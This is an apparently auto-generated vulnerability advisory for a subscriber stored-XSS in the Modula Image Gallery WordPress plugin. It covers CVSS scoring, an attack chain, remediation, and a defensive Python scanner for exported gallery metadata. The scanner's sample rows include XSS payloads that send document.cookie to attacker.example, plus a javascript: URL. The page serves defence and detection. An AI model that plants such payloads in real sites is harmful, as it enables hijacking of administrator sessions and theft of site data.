
Modula Image Gallery CVE-2026-42688

EUVD-2026-36836 · MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-15 · Patchstack · GHSA-cq6v-9fx8-4hwq
CVSS 3.1 base score 6.5 · Vendor: Patchstack

Severity by source

Vendor (Patchstack), primary rating: 6.5 MEDIUM
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

vuln.today AI: 5.4 MEDIUM
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Rationale for the AI rating: a subscriber account is required (PR:L); an administrator must view the injected content (UI:R); the impact lands in the victim's browser rather than in the vulnerable plugin itself (S:C); and XSS has no direct availability impact, hence A:N. The two CVSS 3.1 vectors differ only in that Availability metric (vendor A:L vs. A:N), which is what moves the score from 6.5 to 5.4.

CVSS Vector (Vendor: Patchstack)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: Low

Lifecycle Timeline

1. Analysis generated: Jun 15, 2026, 22:58 (vuln.today)

Description (CVE.org)

Subscriber Cross Site Scripting (XSS) in Modula Image Gallery <= 2.14.23 versions.

Analysis (AI)

Subscriber-level stored cross-site scripting in the Modula Image Gallery WordPress plugin (versions up to and including 2.14.23) lets an authenticated user holding only the subscriber role store JavaScript in gallery content that the plugin later outputs without adequate escaping. When a higher-privileged user such as an administrator views the affected gallery, the script runs in that user's browser with their session, so it can issue authenticated requests on their behalf (unauthorized administrative actions) or present a credential-phishing prompt. One caveat on the commonly cited "session hijacking" outcome: WordPress sets its authentication cookies with the HttpOnly flag, so reading them via document.cookie does not normally work; the realistic impact is actions performed inside the victim's live authenticated session rather than exfiltration of the session cookie. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata:

1. Access: register a subscriber account on the target WordPress site (via open registration, or using an existing low-privilege account).
2. Delivery: inject the XSS payload into a Modula Image Gallery field that a subscriber can write to.
3. Persistence: the payload is stored in the WordPress database together with the gallery data.
4. Execution: an administrator visits a page or admin screen that renders the gallery, and the stored script executes in the administrator's browser.
5. Impact: the script acts with the administrator's session, for example by issuing authenticated requests on the admin's behalf. Because WordPress authentication cookies are HttpOnly, exfiltrating the session cookie itself is not the realistic outcome; riding the live session is.

Vulnerability Assessment (AI)

Exploitation: Exploitation requires the attacker to hold at least a WordPress subscriber account on the target site; PR:L in the CVSS vector reflects this authenticated precondition. Sites with open registration ("Anyone can register" under Settings > General) therefore expose the issue to any internet user, while sites that restrict registration limit it to existing low-privilege users. …

Risk Assessment: The vendor CVSS 3.1 score of 6.5 (Medium) follows from the vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L: network-reachable, low complexity, subscriber authentication only, but dependent on an administrator viewing the injected content (UI:R), with Scope: Changed because the impact is in the victim's browser rather than the plugin. …

Exploit Scenario: An attacker registers a free subscriber account on a WordPress site running Modula Image Gallery 2.14.23 or earlier, then places a JavaScript payload in a gallery field that accepts subscriber input. When a site administrator logs in and opens the gallery or the plugin's management screen, the stored script executes silently in the administrator's browser. Because WordPress authentication cookies are HttpOnly, a cookie-stealing payload would not capture the session; a realistic payload instead uses the administrator's live session to make authenticated requests (for example, to create a new administrator account), which yields full administrative access just the same. …

Remediation: Update the Modula Image Gallery plugin to a release later than 2.14.23 that includes the fix (the exact patched version is listed in the full report). Until the update is applied, compensating controls follow from the PR:L precondition: disable open user registration if it is not needed, review existing subscriber accounts, and audit stored gallery content for injected markup. …
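The following Python script is an added example for this page (not code from the Modula plugin, from Patchstack or from vuln.today): it hunts exported gallery metadata for the kind of stored payload the scenario above describes, including attribute-breakout payloads that contain no `<` at all, while leaving properly entity-escaped text alone. The meta key name `gallery_images`, the JSON field layout and every sample row are constructed assumptions; against a real site you would export the plugin's actual meta keys from wp_postmeta (or the gallery post content) and feed those rows in.

```python
"""Hunt exported WordPress gallery metadata for stored-XSS payloads.

Added example for this advisory page; it is not code from Modula, Patchstack
or vuln.today. Assumptions: gallery data is available as (post_id, meta_key,
meta_value) rows exported from wp_postmeta, and meta_value is JSON. The meta
key name "gallery_images", the field names and every sample row below are
constructed for the example and are not the plugin's real schema.
"""
import json
import re
from html.parser import HTMLParser

# Markup that has no business in a caption, alt text or title.
DANGEROUS_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
                  "style", "link", "meta", "base", "form"}
EVENT_HANDLER = re.compile(r"^on[a-z]+$", re.I)
DANGEROUS_URL = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.I)


class PayloadScanner(HTMLParser):
    """Records dangerous tags, on* event handlers and script-scheme URLs."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # &lt;script&gt; stays text
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"tag:<{tag}>")
        for name, value in attrs:
            if EVENT_HANDLER.match(name):
                self.findings.append(f"attr:{name}")
            if value and DANGEROUS_URL.match(value):
                self.findings.append(f"url:{value.strip()[:20]}")


def scan_html(fragment):
    parser = PayloadScanner()
    parser.feed(fragment)
    parser.close()
    return parser.findings


def scan_string(value):
    """Scan a stored string as-is and as it would land inside an unescaped
    HTML attribute, so attribute-breakout payloads (x" onerror="...) are
    caught even though the raw string contains no '<'."""
    found = set(scan_html(value))
    found.update(scan_html('<x a="' + value + '">'))
    return sorted(found)


def iter_strings(node):
    """Yield every string nested anywhere in a decoded JSON value."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for child in node.values():
            yield from iter_strings(child)
    elif isinstance(node, list):
        for child in node:
            yield from iter_strings(child)


def scan_rows(rows):
    """Return (post_id, meta_key, finding) for every suspicious stored string.
    Non-JSON values (e.g. PHP-serialised blobs) are scanned as raw text."""
    results = []
    for post_id, meta_key, meta_value in rows:
        try:
            strings = list(iter_strings(json.loads(meta_value)))
        except ValueError:
            strings = [meta_value]
        for value in strings:
            for finding in scan_string(value):
                results.append((post_id, meta_key, finding))
    return results


# Constructed sample export. Rows 102 and 103 carry a cookie-reading payload
# of the kind the advisory scenario describes; note that WordPress sets its
# auth cookies HttpOnly, so such a payload would not actually read them.
SAMPLE_ROWS = [
    (101, "gallery_images", json.dumps([{"id": 7, "alt": "Sunset",
        "description": "Taken in <em>Lisbon</em>"}])),
    (102, "gallery_images", json.dumps([{"id": 9, "description": "",
        "alt": "x\" onerror=\"fetch('https://attacker.example/?c='+document.cookie)"}])),
    (103, "gallery_images", json.dumps([{"id": 11, "alt": "",
        "description": "<script>new Image().src='https://attacker.example/?'+document.cookie</script>"}])),
    (104, "gallery_images", json.dumps([{"id": 12, "link": "javascript:alert(document.domain)"}])),
    (105, "gallery_images", json.dumps([{"id": 13, "description": "Use &lt;b&gt; for bold"}])),
]

if __name__ == "__main__":
    for post_id, meta_key, finding in scan_rows(SAMPLE_ROWS):
        print(f"post {post_id} {meta_key}: {finding}")
```

Run as a file it prints one line per finding (rows 102, 103 and 104 in the sample; the benign row 101 and the entity-escaped row 105 are left alone). A hit on a gallery that a subscriber-level account could edit is a reason to review that account's activity and strip the markup, not just to update the plugin.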
